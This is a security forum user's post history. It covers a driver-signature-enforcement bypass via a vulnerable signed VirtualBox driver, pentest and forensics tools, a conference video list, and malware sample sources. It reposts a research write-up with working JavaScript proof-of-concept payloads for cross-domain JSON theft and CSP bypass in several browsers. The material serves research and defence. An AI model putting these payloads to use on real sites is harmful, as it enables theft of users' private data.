Everything posted by Nytro

  1. Yes, a classic "PE Backdoor" example; he forgot, however, to do "Realign PE Header" (Number of Sections, Size of Code... will differ), but it works.
  2. Epic!
  3. Has anyone tried 3.4? Does it work? Use a virtual machine for testing.
  4. I checked the code (not really in detail) and it looks like this:
     - It unloads the VirtualBox driver if it is already running
     - It loads a vulnerable VirtualBox driver, WHICH IS SIGNED AND ALLOWED TO RUN (if you download https://github.com/hfiref0x/TDL/blob/master/Source/Furutaka/drv/vboxdrv_exploitable.sys and check its properties you can see this)
     - It exploits a vulnerability in that vulnerable driver
     - It executes shellcode in kernel context, from which it is able to load another (minimal) kernel module
     This is the bypass of "Driver Signature Enforcement": it avoids PatchGuard (which DSEFix would trigger). I am not entirely sure this is accurate; if I have some time, I will take a more detailed look.
  5. Don't use that Bundle junk (Firefox).
  6. Last useful stuff I saw on this subject was this one: http://blog.ptsecurity.com/2014/09/microsoft-windows-81-kernel-patch.html And you should also check this: https://github.com/hfiref0x/TDL However, I think they are working from time to time on this, so even if some bypasses are found, they are "probably" fixed. Also, you should take in consideration from here: https://msdn.microsoft.com/en-us/windows/hardware/drivers/install/driver-signing Note Windows 10 for desktop editions (Home, Pro, Enterprise, and Education) and Windows Server 2016 kernel-mode drivers must be signed by the Windows Hardware Dev Center Dashboard, which requires an EV certificate. For details, see Driver Signing Changes in Windows 10. Also, check this: https://msdn.microsoft.com/en-us/windows/hardware/drivers/install/kernel-mode-code-signing-policy--windows-vista-and-later- Tools: https://github.com/tandasat/PgResarch and https://github.com/tandasat/findpg
  7. DFF is an Open Source computer forensics platform built on top of a dedicated Application Programming Interface (API). DFF proposes an alternative to the aging digital forensics solutions used today. Designed for simple use and automation, the DFF interface guides the user through the main steps of a digital investigation, so it can be used by both professionals and non-experts to quickly and easily conduct a digital investigation and perform incident response. DFF follows three main goals:
     Modularity - In contrast to the monolithic model, the modular model is based on a core and many modules. This modular design has two advantages: it allows the software to be improved rapidly, and it lets tasks be split easily among developers.
     Scriptability - The ability to be scripted obviously gives a tool more flexibility, but it also enables automation and makes it possible to extend features.
     Genericity - The project tries to remain Operating System agnostic. We want to help people where they are, letting them choose any Operating System to use DFF.
     Among the supported features of DFF:
     • Automated analysis: mount partitions and file systems and extract file metadata and other useful information in an automated way; generate an HTML report with system and user activity
     • Direct device reading support
     • Supported forensic image file formats: AFF, E01, Ex01, L01, Lx01, dd, raw, bin, img
     • Supported volumes and file systems, with unallocated space, deleted items, slack space, ...: DOS, GPT, VMDK, Volume Shadow Copy, NTFS, HFS+, HFSX, EXT2, EXT3, EXT4, FAT12, FAT16, FAT32
     • Embedded viewers for videos, images, PDF, text, office documents, registry, evt, evtx, sqlite, ...
     • Outlook and Exchange mailboxes (PAB, PST, OST)
     • Metadata extraction: compound files (Word, Excel, Powerpoint, MSI, ...), Windows Prefetch, Exif information, LNK
     • Browser history: Firefox, Chrome, Opera
     • System and user activity: connected devices, user accounts, recent documents, installed software, network, ...
     • Volatile memory analysis with a graphical interface to Volatility
     • Video thumbnail generation
     • Support for Sqlite, Windows Registry, Evt and Evtx
     • Full Skype analysis (Sqlite and old DDB format)
     • Timeline based on all gathered timestamps (file systems and metadata)
     • Hashset support with automatic "known bad" / "known good" tagging
     • Mount functionality to access recovered files and folders from your local system
     • In-place carving
     • ...
     Sursa: https://github.com/arxsys/dff
  8. Needle is an open source, modular framework to streamline the process of conducting security assessments of iOS apps. Description Assessing the security of an iOS application typically requires a plethora of tools, each developed for a specific need and all with different modes of operation and syntax. The Android ecosystem has tools like "drozer" that have solved this problem and aim to be a ‘one stop shop’ for the majority of use cases, however iOS does not have an equivalent. Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Given its modular approach, Needle is easily extensible and new modules can be added in the form of python scripts. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections. The only requirement in order to run Needle effectively is a jailbroken device. Needle is open source software, maintained by MWR InfoSecurity. Link: https://github.com/mwrlabs/needle
  9. hunter - (l)user hunter using WinAPI calls only. Introduction: During Red Team engagements it is common to track/hunt specific users. Assume we already have access to a desktop as a normal user (no matter how; always "assume compromise") in a Windows Domain and we want to spread laterally. We want to know where the user is logged on, whether he is a local administrator on any box, which groups he belongs to, whether he has access to file shares, and so on. Enumerating hosts, users, and groups will also help to get a better understanding of the Domain layout. You might be thinking, "use PowerView". Lately, one of the most common problems I encounter during Red Team exercises is the fact that PowerShell is heavily monitored. If you use it, you'll get caught, sooner or later. By now everyone is well aware of how powerful PowerShell is, including Blue Teams and Security Vendors. There are multiple ways to work around this. To avoid using multiple old-school tools (psloggedon.exe, netsess.exe, nltest, netview, among others) and to reduce the number of tools uploaded to compromised systems, I created a simple tool that doesn't require administrative privileges to run and collect the information listed below, and relies only on the Windows API. You might end up dealing with whitelist bypass and process evasion, but I'll leave that for another day. Link: https://github.com/fdiskyou/hunter
  10. BSLV16 BSidesLV 77 videos 446 views Last updated on Nov 17, 2016 Opening Keynote Pt. I & II - Lorrie Cranor-FTC, Michael Kaiser-NCSA by BSidesLV 36:18 Network Access Control: The Company-Wide Team Building Exercise That Only You Know About - Dean Webb by BSidesLV 26:27 Managing Security with the OWASP Assimilation Project - Alan Robertson by BSidesLV 40:17 Toward Better Password Requirements - Jim Fenton by BSidesLV 56:33 Data Science or Data Pseudo-Science? - Ken Westin by BSidesLV 41:51 I Am The Cavalry (IATC) Introduction and Overview - Joshua Corman by BSidesLV 23:33 Shall We Play a Game? 30 Years of the CFAA - Leonard Bailey, Jen Ellis by BSidesLV 1:28:31 Calling All Hacker Heroes: Go Above And Beyond - Keren Elazari by BSidesLV 29:19 Intro to Storage Security, Looking Past the Server - Jarett Kulm by BSidesLV 24:47 Are You a PenTexter? - Peter Mosmans, Melanie Rieback by BSidesLV 43:41 Deep Adversarial Architectures for Detecting (and Generating) Maliciousness - Hyrum Anderson by BSidesLV 39:09 I Am The Cavalry Panel: Progress on Cyber Safety by BSidesLV 35:50 Welcome to The World of Yesterday, Tomorrow! 
- Joel Cardella by BSidesLV 46:46 Breaking the Payment Points of Interaction (POI) - Nir Valtman, Patrick Watson by BSidesLV 49:06 Cyber Safety And Public Policy - I Am The Cavalry, Amanda Craig, Jen Ellis by BSidesLV 55:23 Security Vulnerabilities, the Current State of Consumer Protection Law, & How IOT Might Change It by BSidesLV 23:07 How to Get and Maintain your Compliance without ticking everyone off - Rob Carson by BSidesLV 23:13 What we've learned with Two-Secret Key Derivation - Jeffrey Goldberg, Julie Haugh by BSidesLV 35:32 Exposing the Neutrino EK: All the Naughty Bits - Ryan Chapman by BSidesLV 55:08 State Of Healthcare Cyber Safety - Christian Dameff, Colin Morgan, Suzanne Schwartz, BeauWoods by BSidesLV 56:46 State Of Automotive Cyber Safety - IATC - Joshua Corman by BSidesLV 48:53 DNS Hardening - Proactive Net Sec Using F5 iRules and Open Source Analysis Tools - Jim Nitterauer by BSidesLV 25:44 Defeating Machine Learning: Systemic Deficiencies for Detecting Malware by BSidesLV 45:14 Beyond the Tip of the IceBerg - Fuzzing Binary Protocol for Deeper Code Coverage by BSidesLV 46:23 CFPs 101 - Tottenkoph, Guy McDudefella, Security Moey, David Mortman by BSidesLV 47:56 Operation Escalation: How Commodity programs Are Evolving Into Advanced Threats by BSidesLV 52:51 Evaluating a password manager - Evan Johnson by BSidesLV 31:26 Why does everyone want to kill my passwords? 
- Mark Burnett by BSidesLV 32:11 How to make sure your data science isn't vulnerable to attack - Leila Powell by BSidesLV 57:19 DYODE: Do Your Own DiodE for Industrial Control Systems - AryKokos, Arnaud Soullie by BSidesLV 43:10 Ingress Egress: The emerging threats posed by augmented reality gaming - Andrew Brandt by BSidesLV 1:00:45 Ground Truth Keynote: Great Disasters of Machine Learning - Davi Ottenheimer by BSidesLV 32:23 IATC Day 2: Introduction and Overview - Joshua Corman, Beau Woods by BSidesLV 12:44 Mapping the Human Attack Surface - Louis DiValentin (Master Chen) by BSidesLV 26:19 Don't Repeat Yourself: Automating Malware Incident Response for Fun and Profit - Kuba Sendor by BSidesLV 29:57 Crafting tailored wordlists with Wordsmith - Sanjiv Kawa, Tom Porter by BSidesLV 47:07 Hunting high-value targets in corporate networks - Patrick Fussell, Josh Stone by BSidesLV 39:07 A Noobs Intro Into Biohacking, Grinding, DIY Body Augmentation - Doug Copeland by BSidesLV 23:19 No Silver Bullet, Multi contextual threat detection via Machine Learning - Rod Soto, Joseph Zadeh by BSidesLV 52:34 Stop the Insanity and Improve Humanity: UX for the Win - Robin Burkett by BSidesLV 26:10 Powershell-Fu - Hunting on the Endpoint - Chris Gerritz by BSidesLV 27:38 Labeling the VirusShare Corpus: Lessons Learned - John Seymour by BSidesLV 30:21 There is no security without privacy - Craig Cunningham by BSidesLV 30:35 Survey says…Making progress in the Vulnerability Disclosure Debate - Allan Friedman by BSidesLV 1:27:38 Domains of Grays - Eric Rand by BSidesLV 38:29 Automated Dorking for Fun and Pr^wSalary - Filip Reesalu by BSidesLV 13:17 [Private Video] You Don't See Me - Abusing Whitelists to Hide and Run Malware - Michael Spaling by BSidesLV 28:29 Six Degrees of Domain Admin... 
- Andy Robbins, Will Schroeder, Rohan Vazarkar by BSidesLV 51:51 Uncomfortable Approaches - Joshua Corman, Beau Woods by BSidesLV 45:37 Latest evasion techniques in fileless malware - fl3uryz & Andrew Hay by BSidesLV 26:37 PLC for Home Automation and How It Is as Hackable as a Honeypot - Philippe Lin & Scott Erven by BSidesLV 16:22 CyPSA Cyber Physical Situational Awareness - Kate Davis, Edmond Rogers by BSidesLV 41:12 Hacking Megatouch Bartop Games - Mark Baseggio by BSidesLV 34:54 Passphrases for Humans: A Cultural Approach to Passphrase Wordlist Generation by BSidesLV 58:58 Is that a penguin in my Windows? - Spencer McIntyre by BSidesLV 39:48 Automation Plumbing - Ashley Holtz & Kyle Maxwell by BSidesLV 25:06 Disclosing Passwords Hashing Policies - Michal Spacek by BSidesLV 33:12 PAL is your pal: Bootstrapping secrets in Docker - Nick Sullivan by BSidesLV 51:00 Dominating the DBIR Data - Anastasia Atanasoff, Gabriel Bassett by BSidesLV 56:15 An Evolving Era of Botnet Empires - Andrea Scarfo by BSidesLV 28:28 Building an EmPyre with Python - Steve Borosh Alexander Rymdeko-Harvey, Will Schroeder by BSidesLV 50:19 Scalability: Not as Easy as it SIEMs - Keith Kraus & grecs by BSidesLV 22:38 Ethical implications of In-Home Robots - Guy McDudefella, Brittany Postnikoff by BSidesLV 47:31 The Deal with Password Alternatives - Terry Gold by BSidesLV 55:15 QUESTIONING 42: Where is the "engineering" in the Social Engineering of Namespace Compromises? by BSidesLV 1:04:23 Cross-platform Compatibility: Bringing InfoSec Skills into the World of Computational Biology by BSidesLV 31:27 One Compromise to Rule Them All - Bryce Kunz by BSidesLV 53:00 The Future of Bsides - Panel Session by BSidesLV 52:46 What's Up Argon2? 
The Password Hashing Winner A Year Later - JP Aumasson by BSidesLV 24:59 Rock Salt: A Method for Securely Storing and Utilizing Password Validation Data by BSidesLV 42:58 I Love my BFF (Brute Force Framework) - Kirk Hayes by BSidesLV 24:06 Proactive Password Leak Processing - Bruce Marshall by BSidesLV Cruise Line Security Assessment OR Hacking the High Seas - Chad Dewey (Adam Brand) by BSidesLV 22:21 Automation of Penetration Testing and the future - Haydn Johnson (Kevin Riggins) by BSidesLV 25:20 Pushing Security from the Outside - Kat Sweet, Chris DeWeese by BSidesLV 26:19 Why it's all snake oil - and that may be ok - Andrew Morris by BSidesLV 46:44 Link: https://www.youtube.com/playlist?list=PLjpIlpOLoRNTG3td7JfV1LDinNFLSHJqM
  11. Friday, November 25, 2016 JSON hijacking for the modern web Benjamin Dumke-von der Ehe found an interesting way to steal data cross domain. Using JS proxies he was able to create a handler that could steal undefined JavaScript variables. This issue seems to be well patched in Firefox; however, I found a new way to enable the attack on Edge. Although Edge seems to prevent assignments to window.__proto__, they forgot about Object.setPrototypeOf. Using this method we can overwrite the __proto__ property with a proxied __proto__. Like so: <script> Object.setPrototypeOf(__proto__,new Proxy(__proto__,{ has:function(target,name){ alert(name); } })); </script> <script src="external-script-with-undefined-variable"></script> <!-- script contains: stealme --> Edge PoC stealing undefined variable If you include a cross domain script containing stealme, you will see it alerts the value even though it's an undefined variable. After further testing I found you can achieve the same thing by overwriting __proto__.__proto__, which is [object EventTargetPrototype] on Edge. <script> __proto__.__proto__=new Proxy(__proto__,{ has:function(target,name){ alert(name); } }); </script> <script src="external-script-with-undefined-variable"></script> Edge PoC stealing undefined variable method 2 Great, so we can steal data cross-domain, but what else can we do? All major browsers support the charset attribute on script, and I found the UTF-16BE charset particularly interesting. UTF-16BE is a multi-byte charset, so two bytes will actually form one character. If, for example, your script starts with [" this will be treated as the character 0x5b22, not 0x5b 0x22. 0x5b22 happens to be a valid JavaScript variable =). Can you see where this is going? Let's say we have a response from the web server that returns an array literal and we can control some of it. We can make the array literal an undefined JavaScript variable with a UTF-16BE charset and steal it using the technique above. 
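The leak primitive behind the Edge PoC above is a Proxy `has` trap placed on the global object's prototype chain, which then observes every lookup of an undeclared identifier. A minimal Node simulation of that primitive (this is my sketch, not the Edge PoC itself; `stealme` stands in for the undeclared variable in the external script):

```javascript
// Record every identifier name that falls through to the global
// prototype chain -- this is what alert(name) does in the PoC.
const leaked = [];

Object.setPrototypeOf(globalThis, new Proxy(Object.getPrototypeOf(globalThis), {
  has(target, name) {
    leaked.push(name);               // the undeclared variable's NAME leaks here
    return Reflect.has(target, name); // preserve normal lookup behaviour
  }
}));

// Referencing an undeclared variable consults the global object,
// whose prototype chain now contains our proxy.
try { stealme; } catch (e) { /* ReferenceError, as expected */ }

console.log(leaked.includes('stealme')); // prints true
```

In the browser attack the same trap fires for variables declared by a cross-domain `<script src=...>` include, so their names (and, via the charset trick below, data) leak to the attacker's page.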
The only caveat is that the resulting characters, when combined, must form a valid JavaScript variable. For example, let's take a look at the following response: ["supersecret","input here"] To steal supersecret we need to inject a NULL character followed by two a's; for some reason Edge doesn't treat it as UTF-16BE unless it has those injected characters. Maybe it's doing some sort of charset sniffing, or maybe it's truncating the response and the characters after NULL are not a valid JS variable on Edge; I'm not sure, but in my tests it seems to require a NULL padded out with some characters. See below for an example: <!doctype HTML> <script> Object.setPrototypeOf(__proto__,new Proxy(__proto__,{ has:function(target,name){ alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); })); } })); </script> <script charset="UTF-16BE" src="external-script-with-array-literal"></script> <!-- script contains the following response: ["supersecret","<?php echo chr(0)?>aa"] --> Edge PoC stealing JSON feeds So we proxy the __proto__ property as before, include the script with a UTF-16BE charset, and the response contains a NULL followed by two a's in the second element of the array literal. I then decode the UTF-16BE encoded string by bit shifting by 8 to obtain the first byte and a bitwise AND to obtain the second byte. The result is an alert popup of ["supersecret"," as you can see; Edge seems to truncate the response after the NULL. Note this attack is fairly limited because many characters, when combined, do not produce a valid JavaScript variable. However, it may be useful to steal small amounts of data. Stealing JSON feeds in Chrome It gets worse. Chrome is far more liberal with scripts that have an exotic charset. You don't need to control any of the response in order for Chrome to use the charset. The only requirement is that, as before, the characters combined together produce a valid JavaScript variable. 
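The bit-shifting decode used throughout these PoCs is worth unpacking: under the UTF-16BE charset the browser pairs each two ASCII bytes into one code unit, and `>>8` / `&0xff` splits them back apart. A self-contained sketch (function names are mine):

```javascript
// The decode step from the PoCs' replace() callbacks: each code unit
// holds two original bytes (high byte >> 8, low byte & 0xff).
function decodeUTF16BE(s) {
  return s.replace(/[\s\S]/g, c => {
    const code = c.charCodeAt(0);
    return String.fromCharCode(code >> 8, code & 0xff);
  });
}

// What the browser "sees": raw ASCII bytes paired into UTF-16BE code units.
function asUTF16BE(ascii) {
  return ascii.match(/[\s\S]{2}/g)
    .map(p => String.fromCharCode((p.charCodeAt(0) << 8) | p.charCodeAt(1)))
    .join('');
}

// '[' (0x5b) and '"' (0x22) fuse into the single character 0x5b22,
// which is a valid start for a JavaScript identifier.
console.log(asUTF16BE('["secret"]'));                // one short exotic identifier
console.log(decodeUTF16BE(asUTF16BE('["secret"]'))); // '["secret"]'
console.log(decodeUTF16BE('\u5b22'));                // '["'
```

The round trip is lossless, which is why leaking the exotic identifier name leaks the original JSON bytes.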
In order to exploit this "feature" we need another undefined variable leak. At first glance Chrome appears to have prevented overwriting the __proto__ however they forgot how deep the __proto__ goes... <script> __proto__.__proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{ has:function f(target,name){ var str = f.caller.toString(); alert(str.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); })); } }); </script> <script charset="UTF-16BE" src="external-script-with-array-literal"></script> <!-- script contains the following response: ["supersecret","abc"] --> NOTE: This was fixed in Chrome 54 Chrome PoC stealing JSON feeds works in version 53 We go 5 levels deep down the __proto__ chain and overwrite it with our proxy, then what happens next is interesting, although the name argument doesn't contain our undefined variable the caller of our function does! It returns a function with our variable name! Obviously encoded in UTF-16BE, it looks like this: function 嬢獵灥牳散牥琢Ⱒ慢挢崊 Waaahat? So our variable is leaking in the caller. You have to call the toString method of the function in order to get access to the data otherwise Chrome throws a generic exception. I tried to exploit this further by checking the constructor of the function to see if it returns a different domain (maybe Chrome extension context). When adblock plus was enabled I saw some extension code using this method but was unable to exploit it since it appeared to be just code injecting into the current document. In my tests I was also able to include xml or HTML data cross domain even with text/html content type which makes this a pretty serious information disclosure. This vulnerability has now been patched in Chrome. Stealing JSON feeds in Safari We can also easily do the same thing in the latest version of Safari. We just need to use one less proto and use "name" from the proxy instead of the caller. 
<script> __proto__.__proto__.__proto__.__proto__=new Proxy(__proto__,{ has:function f(target,name){ alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); })); } }); </script> Safari PoC stealing JSON feeds After further testing I found Safari is vulnerable to the same issue as Edge and only requires __proto__.__proto__. Hacking JSON feeds without JS proxies I mentioned that the UTF-16BE charset works in every major browser; how can you hack JSON feeds without JS proxies? First you need to control some of the data, and the feed has to be constructed in such a way that it produces a valid JavaScript variable. Getting the first part of the JSON feed, before your injected data, is pretty easy: all you do is output a UTF-16BE encoded string which assigns the non-ASCII variable a specific value, then loop through the window and check if this value exists; the property name will then contain all of the JSON feed before your injection. The code looks like this: =1337;for(i in window)if(window[i]===1337)alert(i) This code is then encoded as a UTF-16BE string, so we actually get the code instead of a non-ASCII variable. In effect this means just padding each character with a NULL. To get the characters after the injected string, I simply use the increment operator and make the encoded string after it a property of window. Then we call setTimeout and loop through the window again, but this time checking for NaN, which will have a variable name of our encoded string. See below: setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i);}catch(e){}}});++window.a I've wrapped it in a try catch because on IE window.external will throw an exception when checked with isNaN. 
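The window-scanning trick just described can be simulated with a plain object standing in for `window` (a hypothetical sketch; in the real attack the exotic property name is created by the UTF-16BE-misread JSON prefix, not hardcoded as here):

```javascript
// Stand-in for the browser's window object (Node has no window).
const win = {};

// The misread JSON prefix plus the injected "=1337" behaves like
//   <exotic identifier> = 1337
// which creates a global property whose NAME encodes the stolen prefix.
win['\u5b22\u7361'] = 1337; // '\u5b22\u7361' is the bytes '["sa' read as UTF-16BE

// The attacker's scan: find the sentinel value, steal the property name.
let stolenName = null;
for (const k in win) {
  if (win[k] === 1337) stolenName = k;
}

// Decode the name back to the original bytes, as in the PoCs.
const recovered = stolenName.replace(/[\s\S]/g, c => {
  const code = c.charCodeAt(0);
  return String.fromCharCode(code >> 8, code & 0xff);
});
console.log(recovered); // '["sa'
```

The suffix scan works the same way, except the sentinel is `NaN` (produced by `++window.<encoded suffix>`) rather than 1337.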
The whole JSON feed will look like this: {"abc":"abcdsssdfsfds","a":"<?php echo mb_convert_encoding("=1337;for(i in window)if(window[i]===1337)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}));setTimeout(function(){for(i in window){try{if(isNaN(window[i])&&typeof window[i]===/number/.source)alert(i.replace(/./g,function(c){c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff);}))}catch(e){}}});++window.", "UTF-16BE")?>a":"dasfdasdf"} Hacking JSON feeds without proxies PoC Bypassing CSP As you might have noticed, a UTF-16BE converted string will also convert new lines to non-ASCII variables, which gives it the potential to even bypass CSP! The HTML document will be treated as a JavaScript variable. All we have to do is inject a script with a UTF-16BE charset that injects into itself, has an encoded assignment, and a payload with a trailing comment. This will bypass a CSP policy that allows scripts to reference the same domain (which is the majority of policies). The HTML document will have to look like this: <!doctype HTML><html> <head> <title>Test</title> <?php echo $_GET['x']; ?> </head> <body> </body> </html> Notice there is no new line after the doctype; the HTML is constructed in such a way that it is valid JavaScript. The characters after the injection don't matter, because we inject a trailing single-line JavaScript comment and the new lines are converted too. Note that there is no charset declared in the document; this isn't because the charset matters, it's because the quotes and attributes of the meta element would break the JavaScript. The payload looks like this (note the tab is required in order to construct a valid variable): <script%20src="index.php?x=%2509%2500%253D%2500a%2500l%2500e%2500r%2500t%2500(%25001%2500)%2500%253B%2500%252F%2500%252F"%20charset="UTF-16BE"></script> Note: This has been patched on later versions of PHP; it defaults to the UTF-8 charset for text/html content type, therefore preventing the attack. 
However, I've simply added a blank charset to the JSON response so it still works on the lab. CSP bypass using UTF-16BE PoC Other charsets I fuzzed every browser and charset. Edge was pretty useless to fuzz because, as mentioned previously, it does some sort of charset sniffing, and if you don't have certain characters in the document it won't use the charset. Chrome was very accommodating, especially because the dev tools let you filter the results of the console by a regex. I found that the ucs-2 charset allowed you to import XML data as a JS variable, but it is even more brittle than UTF-16BE. Still, I managed to get the following XML to import correctly on Chrome. <root><firstname>Gareth</firstname><surname>a<?php echo mb_convert_encoding("=1337;for(i in window)if(window[i]===1337)alert(i);setTimeout(function(){for(i in window)if(isNaN(window[i]) && typeof window[i]===/number/.source)alert(i);});++window..", "iso-10646-ucs-2")?></surname></root> The above no longer works in Chrome, but I've included it as another example. UTF-16 and UTF-16LE looked useful too, since the output of the script looked like a JavaScript variable, but they caused invalid syntax errors when including a doctype, xml or a JSON string. Safari had a few interesting results too, but in my tests I couldn't get it to produce valid JavaScript. It might be worth exploring further, but it will be difficult to fuzz, since you'd need to encode the characters in the charset you are testing in order to produce a valid test. I'm sure the browser vendors will be able to do that more effectively. CSS You might think this technique could be applied to CSS, and in theory it should, since any HTML will be converted into a non-ASCII invalid CSS selector; but in reality browsers seem to look at the document to see if there's a doctype header before parsing the CSS with the selected charset, and they ignore the stylesheet, making a self-injected stylesheet fail. 
Edge, Firefox and IE in standards mode also seem to check the mime type; Chrome says the stylesheet was interpreted, but at least in my tests it didn't seem that way. Mitigation The charset attacks can be prevented by declaring your charset, such as UTF-8, in an HTTP content type header. PHP 5.6 also prevents these attacks by declaring a UTF-8 charset if none is set in the content-type header. Conclusion Edge, Safari and Chrome contain bugs that will allow you to read cross domain undeclared variables. You can use different charsets to bypass CSP and steal script data. Even without proxies you can steal data if you can control some of the JSON response. Enjoy - @garethheyes Posted by Gareth Heyes at 10:03 AM Sursa: http://blog.portswigger.net/2016/11/json-hijacking-for-modern-web.html
  12. Agenda:
      1. Introduction (Jason)
      2. Compute Architecture Evolution (Jason)
      3. Chip Level Architecture (Jason) - subslices, slices, products
      4. Gen Compute Architecture (Maiyuran) - execution units
      5. Instruction Set Architecture (Ken)
      6. Memory Sharing Architecture (Jason)
      7. Mapping Programming Models to Architecture (Jason)
      8. Summary
      Download slides: https://software.intel.com/sites/default/files/managed/89/92/Intel-Graphics-Architecture-ISA-and-microarchitecture.pdf
  13. The Tor Phone prototype: a truly private smartphone? 29 NOV 2016, by Bill Camarda The Tor Project has long offered high-security alternatives for folks who are especially concerned about their privacy. But as the world goes mobile, and is increasingly accessed through smartphones, users become vulnerable to a whole new set of compromises. That's where the Tor Phone prototype comes in - and it's just been significantly improved. According to developer Mike Perry, Tor Phone aims: ...to demonstrate that it is possible to build a phone that respects user choice and freedom, vastly reduces vulnerability surface, and sets a direction for the ecosystem with respect to how to meet the needs of high-security users. It's also "meant to show that it is still possible to replace and modify your mobile phone's operating system while retaining verified boot security - though only just barely". Tor Phone starts with Copperhead OS, an open-source Android fork focused on security. As Perry writes: Copperhead is also the only Android ROM that supports Verified Boot, which prevents exploits from modifying the boot, system, recovery, and vendor device partitions... Copperhead has also extended this protection by preventing system applications from being overridden by Google Play Store apps, or from writing bytecode to writable partitions (where it could be modified and infected). Therein lies a huge obstacle to Tor Phone deployment, however. Together with Copperhead, Tor Phone installs the Orbot Tor proxy app, the OrWall firewall, the F-Droid alternative app repository, additional tools, and finally, Google Play (primarily, Perry says, so you can retrieve the Signal app for encrypted voice calling and instant messaging). Its components must install to the system partition. Therefore, says Perry: We must re-sign the Copperhead image and updates... to [maintain] system integrity from Verified Boot. 
Unfortunately, only selected Google Nexus/Pixel devices let users control this with their own keys while still supporting Verified Boot. So you can't do this with your own cheap-o Android device, no matter how strong your Linux and related skills are; what's more, a quick look at the directions confirms that setting up Tor Phone is non-trivial. You can jumpstart the process by purchasing a smartphone with Copperhead pre-installed - for the moment, of course, while supplies last. And, with the right hardware, says Perry, Tor Phone works: notwithstanding some "rough edges," he relies on his right now. Why bother with all this? Perry and Tor argue that Google is increasingly moving to lock down the Android platform, claiming it's the only way to overcome Android's "fragmentation and resulting insecurity". Tor argues instead for a strategy based on transparency: [As] more components and apps are moved to closed source versions, Google [reduces] its ability to resist the demand that backdoors be introduced. Those might come from nefarious governments, of course. But, in Ars Technica, Perry notes that untraceable backdoors might also be introduced by hackers purely interested in financial gain. This is less likely, he argues, if a mobile OS remains fully open... We are concerned that the freedom of users to use, study, share, and improve the operating system software on their phones is being threatened. If we lose these freedoms on mobile, we may never get them back. For Tor Phone to gain traction, it'll probably need to run on more than a couple of high-end devices manufactured by Google itself. In Ars Technica, Perry stresses that Tor won't enter the secure hardware business. 
But someone could, he says, citing the crowdfunded Neo900 project as a model: What I've found is that posts like [his Tor Phone update] energise the Android hobbyist/free software ecosystem, and make us aware of each other and common purpose. If you're thinking "sounds like there's a long way to go," Perry might agree. He named his current prototype "Mission Improbable". But that's big progress: he named the previous prototype "Mission Impossible". Sursa: https://nakedsecurity.sophos.com/2016/11/29/the-tor-phone-prototype-a-truly-private-smartphone/
  14. testssl.sh: Testing TLS/SSL encryption Name Last Modified Size Type legacy-2.6/ 2016-Nov-13 12:37:56 -- Directory openssl-1.0.2i-chacha.pm.ipv6.contributed/ 2016-Sep-26 23:15:22 -- Directory CHANGELOG.txt 2015-Sep-15 10:56:45 12.27KB TXT Type Document LICENSE.txt 2014-May-03 11:04:22 17.59KB TXT Type Document OPENSSL-LICENSE.txt 2015-Oct-13 00:12:23 58.08KB TXT Type Document bash-heartbleed.changelog.txt 2014-May-03 17:37:15 572.00B TXT Type Document bash-heartbleed.sh 2015-Oct-27 15:11:18 3.98KB SH File ccs-injection.sh 2014-Jun-14 23:44:42 3.94KB SH File mapping-rfc.txt 2014-Dec-21 00:52:13 15.88KB TXT Type Document openssl-1.0.2e-chacha.pm.tar.gz 2015-Sep-15 09:23:07 11.65MB GZ Compressed Archive openssl-1.0.2e-chacha.pm.tar.gz.asc 2015-Sep-16 01:17:54 828.00B ASC File openssl-1.0.2i-chacha.pm.ipv6.Linux+FreeBSD.tar.gz 2016-Jun-23 11:34:57 9.45MB GZ Compressed Archive openssl-1.0.2i-chacha.pm.ipv6.Linux+FreeBSD.tar.gz.asc 2016-Jun-23 11:33:36 811.00B ASC File openssl-ms14-066.Linux.x86_64 2016-Apr-15 12:36:23 4.24MB X86_64 File openssl-rfc.mappping.html 2016-Feb-06 16:19:09 57.88KB HTML File testssl.sh 2016-Nov-20 19:26:02 427.82KB SH File testssl.sh is a free command line tool which checks a server's service on any port for the support of TLS/SSL ciphers, protocols as well as recent cryptographic flaws and more. Version 2.8 is being finalized. 2.6 is outdated, has more bugs and less features. Please checkout 2.8rc3 @ github or download the stable 2.8rc3 version from here Key features Clear output: you can tell easily whether anything is good or bad Ease of installation: It works for Linux, Darwin, FreeBSD and MSYS2/Cygwin out of the box: no need to install or configure something, no gems, CPAN, pip or the like. 
- Flexibility: you can test any SSL/TLS enabled and STARTTLS service, not only webservers at port 443
- Toolbox: several command line options help you to run YOUR test and configure YOUR output
- Reliability: features are tested thoroughly
- Verbosity: if a particular check cannot be performed because of a missing capability on your client side, you'll get a warning
- Privacy: it's only you who sees the result, not a third party
- Freedom: it's 100% open source. You can look at the code, see what's going on and you can change it. Heck, even the development is open (github)
Link: https://testssl.sh/
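testssl.sh itself is a bash script, but the kind of check it automates can be sketched in a few lines of Python. The following is an illustrative sketch, not part of testssl.sh: the weak/OK grading and the probe() helper are my own assumptions, and probe() needs network access to the target host.

```python
import socket
import ssl

# Protocol versions testssl.sh would flag as bad (assumed grading, for illustration).
WEAK = {"SSLv2", "SSLv3", "TLSv1", "TLSv1.1"}

def grade_protocol(name: str) -> str:
    """Return 'OK' for modern protocol versions, 'WEAK' otherwise."""
    return "WEAK" if name in WEAK else "OK"

def probe(host: str, port: int = 443):
    """Connect to host:port and report (negotiated protocol, grade)."""
    ctx = ssl.create_default_context()
    with ctx.wrap_socket(socket.create_connection((host, port)),
                         server_hostname=host) as s:
        return s.version(), grade_protocol(s.version())
```

The real tool goes far beyond this (per-cipher enumeration, vulnerability checks such as Heartbleed and CCS injection), but the "clear output" idea is the same: map each finding to an unambiguous verdict.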
  15. Malware Sample Sources for Researchers
Malware researchers need to collect malware samples to research threat techniques and develop defenses. Researchers can collect such samples using honeypots or download them from known malicious URLs. They can also obtain malware samples from the following sources:
- Contagio Malware Dump: Free; password required
- Das Malwerk: Free
- FreeTrojanBotnet: Free; registration required
